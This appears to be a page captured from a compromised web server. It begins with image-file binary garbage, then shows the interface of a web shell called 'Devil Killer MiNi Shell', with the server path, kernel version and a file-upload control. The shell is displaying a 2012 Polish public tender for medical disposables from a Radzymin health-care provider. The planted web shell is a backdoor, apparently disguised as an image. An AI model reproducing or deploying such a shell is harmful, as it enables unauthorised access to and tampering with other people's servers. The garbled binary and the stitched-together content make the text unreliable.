JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/283642-N-2012.html

<p class="kh_header"><b>Radzymin: Zakup i dostawa materiałów medycznych i sprzętu jednorazowego użytku w 2012r</b><br>
<b>Numer ogłoszenia: 283642 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 022 7865037, faks 022 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.radzymin.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów medycznych i sprzętu jednorazowego użytku w 2012r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szcegółowo określone w załączniku nr 1 do SIWZ, oraz w poszczególnych czesciach zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.13.10-6, 33.14.12.00-2, 33.14.13.20-9, 33.14.11.21-4, 33.14.14.20-0, 33.14.11.00-1, 33.19.25.00-7, 33.14.00.00-3, 33.14.11.00-1, 33.19.41.00-7, 31.71.11.40-6, 30.19.76.34-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W zakresie zadania nr 11  Zamawiający wymaga kartę charakterystyki</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Medyczne im. Bitwy Warszawskiej 1920r. SPZZOZ  ul. Konstytucji 3 Maja 17 budynek przychodni II pietro pok. 214..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 10:00, miejsce: Centrum Medyczne im. Bitwy Warszawskiej 1920r. SPZZOZ  ul. Konstytucji 3 Maja 17 budynek przychodni II pietro pok. 214..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 08.09.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> materiały medyczne i sprzęt jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedłużacz do pompy Infuł. KZ-11 jałowy, niepiroge. nietoksycz.	200 szt
2	Worki do moczu 2000 ml niesteryl	1500 szt
3	Szpatułki drewniane 100 szt. w op.	20 000 szt
4	Veuflon 20G (różowy)	2500 szt
5	 Veuflon 22 G ( niebieski)	2 500 szt
6	Venflon  18 G ( zielony)	50 szt
7	Veuflon  16 G ( szary)	50 szt
8	Velflon 26 G (fioletowy)	200 szt
9	Ostrze chirurgiczne 21  100 szt w op.	300 szt
10	Ostrze chirurgiczne 23  100 szt, w op.	1000 szt
11	Ostrze chirurgiczne 11 100 szt. w op.	1000 szt
12	Ostrze chirurgiczne Nr 15	1 000 szt.
13	Prześcieradła papierowe Rolk  szer. 50 cm.	1500 rolek
14	Pojemnik na zużyte igły 1 L	4000 szt
15	Pojemnik na zużyte igły 0,7 L	500 szt
16	Pojemnik na zużyte igły 0,2 L	200 szt
17	Szkiełka do cyt. z matowym polem do opisu 50 szt. w op.	1000 szt
18	Pojemnik na zużyte igły 0,7 L	500 szt.
19	Wzierniki ginekologiczne Nr S	1500 szt
  20	Opatrunek na oko	100 op.
  22	Ustniki  do spir. MicroLab  jednorazowe papierowe  MK 8 ml 3500 PSA-1000 op. 100 szt.	500 szt
22	Osłonki na głowicę USG  op. 140 szt. w op.	1 500 szt.
23	Utrwalacz do szkieł cytologicznych Cytofix	30 szt.
24	Wziernik ginekologiczny Nr L	600 szt.
25	Wziernik ginekologiczny Nr XS	600 szt.
26	Wziernik ginekologiczny Nr S	4000 szt
27	Wziernik ginekologiczny Nr M	4000 szt
28	Prześcieradło papierowe rolka szer. 40 cm 	100 szt.
29	Kieliszki do podawania leków	3 000 szt.
30	Opaski na zwłoki 	200 szt.
31	Opaski identyfikacyjne dla pacjentów	2000 szt
32	Staza automatyczna	80 szt.
33	Kaniula dożylna typu motylek do pobierania krwi21 G x ? (0,8 x 19mm)	500 szt
34	Bicakcilar	500 szt.
35	Kranik trójprzewodowy	1000 szt
36	Koreczki do velflonów białe	1000 szt
37	Fartuch jednorazowe gumowe	
38	Maski higieniczna na gumki (osłonki na twarz) 50 szt. w op.	3000 szt.
39	Fartuch  gumowe	100 szt
40	Basen plastikowy	50 szt.
41	Kaczka plastikowa	50 szt.
42	Miski nerkowe plastikowe	50 szt.
43	Rurka ustno-gardłowa jednorazowego użytku rozmiar 2	100 szt.
44	Rurka ustno-gardłowa jednorazowego użytku rozmiar 3	100 szt.
45	Rurki intubacyjne z mankietem niskociśnieniowym sylikonowana  4 - 8,5	200 szt.
46	Szpatułki drewniane op. 100 szt.	200 op.
47	Worki do moczu 2000 ml sterylne	1500 szt.
48	Szczoteczki cytologiczne jednorazowe typu CytoBrush	2000 szt.
..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> materiały i sprzęt jednorazowego użytku strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Strzykawka Luer 20 ml. skala co 1 ml rozszerzona do 24 ml 
Plastik  100 szt. w op.	200 op.
Strzykawka Luer 5 ml. skala 0,2 ml rozszerzona do 6 ml
Plastki  100 szt. w op.	200 op.
Strzykawka Luer 10 ml. skala co 0,5 ml rozszerzona do 12 ml
Plastyki   100 szt. w op.	200 op.
Strzykawka Luer 2 ml. skala co 0,1 ml rozszerzona do 3 ml
Plastyki   100 szt. w op.	200 op.
Strzykawki do pompy
infuzyjnej 20ml.	250 szt
Strzykawka do pompy infuzyjnej 50/60  ml 	300 szt.
Rurka ustno-gardłowa Nr 2 	60 szt
Mini - spike	500 szt
Żel do USG 500g	 200  szt
Żel do EKG	60 szt
Maski do podawania tlenu	1000 szt
Dren do maski tlenowej	1000 szt
Strzykawka 100 ml z końcówką do cewników  	500 szt.
Strzykawka Żaneta 100 ml posiadająca dodatkową  nasadkę luer 	500 szt.
Mini Spike - przyrząd do długotrwałego aspirowania płynów i leków z opakowań zbiorczych  filtr cząsteczkowy  5 um , średnica  Spika 5,6 mm , długość kolca 12,5 mm.	700 szt
..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> sprzęt jednorazowego użytku cewniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cewnik Foley dwudrożny
silikonowane.Nr16	200 szt
Cewnik Foley dwudrożny
silikonowane.Nr18	200 szt
Cewnik Foley dwudrożny
silikonowane. Nr20	200 szt
Cewnik Foley dwudrożny
silikonowane.Nr22	200 szt
Cewnik Foley dwudrożny
silikonowane. Nr24	50 szt
Cewnik Foley dwudrożny
silikonowane. Nr14	50 szt.
Cewnik Tiemana Nr 14	10 szt
Cewnik Tiemana Nr 16	10 szt
Cewnik Tiemana Nr 18	10 szt
Cewnik Tienana Nr 20	10 szt.
Cewnik do odsysania Nr 14	1000 szt
Cewnik do odsysania Nr 16	1000 szt
Cewnik do odsysania Nr 18	1000szt
Cewnik do odsysania Nr 20	1000 szt
Cewnik do odsysania Nr 22	1000 szt
Cewnik do podawania tlenu przez nos	800 szt
Cewnik moczowy zewnętrzny, jednorazowy, jednoczęściowy silikonowany, samoprzylepny 25mm	100 szt
Cewnik moczowy zewnętrzny, jednorazowy, jednoczęściowy silikonowany, samoprzylepny 29 mm	100 szt.
Cewnik moczowy zewnętrzny, jednorazowy, jednoczęściowy silikonowany, samoprzylepny 32 mm	100 szt.
Cewnik moczowy zewnętrzny, jednorazowy, jednoczęściowy silikonowany, samoprzylepny 
36 mm	100 szt.
Cewnik moczowy zewnętrzny, jednorazowy, jednoczęściowy silikonowany, samoprzylepny 
41 mm	100 szt
Cewnik Tiemana urologiczny 14-20 CH, długość 400 mm, wykonany z PCV o jakości medycznej, powierzchnia zmrożona, sterylizowane EO, opakowanie folia-papier ( wszystkie rozmiary jednego producenta)	40 szt.
Zgłębnik żołądkowy Nr 24	300 szt
Zgłębnik żołądkowy Nr 22	300 szt.
Zgłębnik żołądkowy Nr 20	300 szt.
Zgłębnik żołądkowy Nr 18	300 szt.
Przedłużacz do tlenu	150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> sprzęt jednorazowego użytku igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igła luer 0,60 x 25    23             100 szt. w op.	20 000 szt
Igła luer 0,50x25 25 GA         100 szt. w op.	30 000 szt
Igła luer 0,70 x 30 22G x 1    100 szt. w op.	10 000 szt
Igła luer 0,80 x 40 21G x 1   100 szt. w op.	30 000 szt
Igła luer 0,90 x 40 20G x 1 100 szt. w op.	30 000 szt
Igła luer 1,2 x 40 18G x 1 100 szt. w op.	30 000 szt
Igły PENOFINE   0,33x12,7 100 szt. w op.	1000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> nici chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Amifil nici chirurgiczne 0/0 w op. 12 szt. igła 3/8 koła 24 mm ostra dł. nici 75 cm.	5 op.
2	Amifil nici chirurgiczne 0/1 w op. 12 szt. igła 3/8 koła 24 mm ostra dł. nici 75 cm.	5 op.
3	Amifil nici chirurgiczne 2/0 w op. 12 szt.  igła 3/8 koła 30 mm ostra 	dł. nici 75 cm	10 op.
4	Amifil nici chirurgiczne 3/0 w op. 12 szt. igła 3/8 koła 19 mm ostra 	dł. nici 75 cm	30  op.
5	Amifil nici chirurgiczne 4/0 w op. 12 szt. igła 3/8 koła 26 mm ostra 	dł. nici 75 cm	40 op.
6	Safil nici chirurgiczne podskórne 1/0   w op. 
36 szt. w op. igła 1/2 koła 30 mm tempa dł. nici 75 cm	5 op.

7	Safil nici chirurgiczne
podskórne 2/0  w op. 36 szt. w op. igła 1/2 koła 30 mm tempa dł. nici 75 cm	5 op.
8	Safil nici chirurgiczne
podskórne 3/0   w op. 36  szt. igła 1/2 koła 26 mm tempa dł. nici 75 cm	5 op.
9	Safil nici chirurgiczne
podskórne 4/0   36  szt. w op. igła 1/2 koła 22 mm tempa dł. nici 75 cm	5 op.
10	Amifil nici chirurgiczne 5/0 w op. 12 szt	50 op.
11	Amifil 6/0 w op. 12 szt	50 op.
12	Ethilon  4/0 w op. 12 szt.	30 op.
13	Ethilon  450 w op. 12 szt.	30 op.
14	Ethilon  6/0 w op. 12 szt.	30 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> sprzęt jednorazowego użytku rękawice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice latex bezkalkowe z witaminą E rozmiar S  po 100 szt. w op.	50 000 szt
Rękawice latex bezkalkowe z witaminą E rozmiar L  po. 100 szt. w op.	15 000szt
Rękawice latex bezkalkowe z witaminą E rozmiar M po 100 szt. w op.	50 000 szt
Rękawice winilowe S	1800 szt
Rękawice chirurg. stery. 7,5   50 szt. w op. 	1 500 szt
Rękawice chirurg. stery.8,5     50 szt. w op.	200 szt
Rękawice chirurgicz. ster. Nr 7 50 szt. w op.	1 500 szt.
Rękawice chirurgicz. ster. Nr 6 50 szt. w op.	 500 szt.
Rękawice nitrylowe S 100 szt w op.  MEDI   CARE	70 000 szt
Rękawice nitrylowe M 100 szt w op.  MEDI   CARE	70 000 szt
Rękawice nitrylowe L 100 szt w op.  MEDI   CARE	15 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> materiały opatrunkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opaska dziana 4 x 15	4 000szt
Opaska dziana 4 x 5	            2 000 szt
Opaska elastyczna 4 x 10	200 szt
Opaska elastyczna 4 x 15	200 szt
Gaza sterylna 1 x 1 m2	150 szt
Gaza opatrunkowa sterylna 1 x  m2	200 szt
Wata bawełniana 200 g	50 op.
Lignina płaty w jednym op.  5 kg	200 kg
Plaster Fixopore 1 m x 6 cm do ciecia	100 op
Opaski gipsowe 3x 120 Mm  1 op. 6 szt.	400 szt
Plaser omnifix E 10 cm x 10 mb.	30 szt
Plaster Omnifix C 15 cm x 10 mb.	10 szt.
Softoplast przylepiec hypoalergiczny włókninowy 5 x 2,5 ( 1op. 12 szt.)	1200 szt
Plastiplast przylepiec hypoalergiczny tkaninowy cielisty  5 x 2,5 ( 1op. 12 szt.)	1000 szt.
Plaster Polovis 5 m x 25 mm 	1000 szt.
Kompres bawełniany nie jałowy 7,5 x7,5 cm   100 szt. w op.	1 200 op.
Kompres bawełniany nie jałowy  10 x 10 cm 100 szt. w po.	1 000 op.
Kompres bawełniany nie jałowy 5x5 cm  100 szt. w op.	1 000 op.
Codofix  Nr 4  ( siatka zabezpieczająca) dł. 7 m.	 50 op.
Codofix Nr 5( siatka zabezpieczająca)dł. 7 m.	 20 op.
Codofix Nr 14( siatka zabezpieczająca) dł. 7 m.	5 op.
Codofix nr 10( siatka zabezpieczająca)dł. 7 m.	5 op.
Codofix nr 8 ( siatka zabezpieczająca)dł. 7 m.	5 op.
Codofix nr 6( siatka zabezpieczająca)dł. 7 m.	5 op.
Steri-strip - paski do zamykania ran ( szwy zewnętrzne)  6mm/ 38 mm	50 szt
Steri-strip - paski do zamykania ran ( szwy zewnętrzne)  3mm/ 75 mm	50 szt
Chusty chirurgiczne jałowe 45/45 cm.	200 szt.
Elastopor samoprzylepny plaster do mocowania kaniuli 	3000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
